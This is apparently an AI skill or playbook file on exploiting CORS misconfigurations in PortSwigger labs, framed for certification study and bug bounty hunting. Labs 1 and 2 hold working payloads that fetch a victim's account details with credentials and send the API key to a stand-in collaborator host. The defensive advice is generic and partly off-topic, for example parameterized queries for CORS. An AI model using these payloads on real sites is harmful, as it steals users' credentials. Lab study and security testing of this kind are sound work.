By name: "CORS Misconfiguration — Complete Deep Dive" description: "Complete PortSwigger deep-dive with exact payloads for every lab variant including zero-day techniques" domain: cybersecurity subdomain: bug-hunting version: "1.0.0" category: "bug-hunting/deep-dive-labs" tags: [portswigger, deep-dive, exploitation, zero-day, lab-solutions] mitre_attack: ["T1189"] tools: [burp-suite, curl, sqlmap, ffuf, python] difficulty: "advanced"
CORS Misconfiguration — Complete Deep Dive
Deep-Dive Lab Playbook — Every PortSwigger lab variant with exact payloads, bypass techniques, and zero-day extensions. Difficulty: 🟢 Apprentice 🟡 Practitioner 🔴 Expert
When to Use
- Studying for BSCP (Burp Suite Certified Practitioner) certification
- Testing real-world targets for these vulnerability classes
- Bug bounty hunting — these exact techniques find real bugs
- Building exploitation chains
Prerequisites
- Burp Suite Professional (Community works for most)
- Browser with proxy configured
- Burp Collaborator or interactsh for OOB testing
Workflow
Phase 1: Reconnaissance
- Identify input vectors, parameters, and application behavior.
Phase 2: Exploitation
- Apply standard lab payloads.
Phase 3: Zero-Day Escalation
- Fuzz filters, bypass WAFs, and chain with other vulns.
Lab Playbooks
Lab 1: Basic origin reflection 🟢 APPRENTICE
<script>
fetch('https://TARGET/accountDetails',{credentials:'include',headers:{'Origin':'https://evil.com'}})
.then(r=>r.json())
.then(d=>fetch('https://COLLAB/?key='+d.apikey));
</script>
Server reflects any Origin in Access-Control-Allow-Origin with credentials: true.
Lab 2: Trusted null origin 🟡 PRACTITIONER
<iframe sandbox="allow-scripts allow-forms" srcdoc="<script>fetch('https://TARGET/accountDetails',{credentials:'include'}).then(r=>r.json()).then(d=>fetch('https://COLLAB/?'+d.apikey));</script>">
Sandboxed iframe sends Origin: null, which the server trusts.
Lab 3: Trusted insecure protocols 🟡 PRACTITIONER
Find subdomain with XSS over HTTP. CORS trusts *.target.com including HTTP. Chain: subdomain XSS → CORS bypass → steal api key.
Blue Team Detection
- Monitor access logs for anomalous payloads.
- Implement strict input validation and parameterized queries where applicable.
- Create WAF rules masking generic attack patterns.
Zero-Day Research Methodology
When a standard technique doesn't work:
- Identify the filter: What chars/patterns are blocked?
- Research bypasses: Search GitHub, Twitter, PortSwigger Research for new techniques
- Fuzz extensively: Use Burp Intruder with custom charset/tag lists
- Chain vulnerabilities: Combine two medium findings into one critical
- Check encoding layers: URL, HTML entity, Unicode, double-encode, XML entity
Key Concepts
| Concept | Description |
|---|---|
| PortSwigger Vectors | Standardized approaches to vulnerability classes. |
| Payload Encoding | Modifying payloads to bypass basic string matching WAFs. |
Output Format
Vulnerability Deep-Dive Report
==============================
Target Vector: [Endpoint]
Bypass Technique: [Explanation of bypass]
Payload Used: [Payload]
Impact Explanation: [Impact]
🔵 Blue Team
- Deploy robust WAF rules to detect anomalies.
- Monitor logs for unusual access patterns.
🛡️ Remediation & Mitigation Strategy
- Input Validation: Sanitize and strictly type-check all inputs.
- Least Privilege: Constrain component execution bounds.
📚 Shared Resources
For cross-cutting methodology applicable to all vulnerability classes, see:
_shared/references/elite-chaining-strategy.md— Exploit chaining methodology and high-payout chain patterns_shared/references/elite-report-writing.md— HackerOne-optimized report writing, CWE quick reference_shared/references/real-world-bounties.md— Verified disclosed bounties by vulnerability class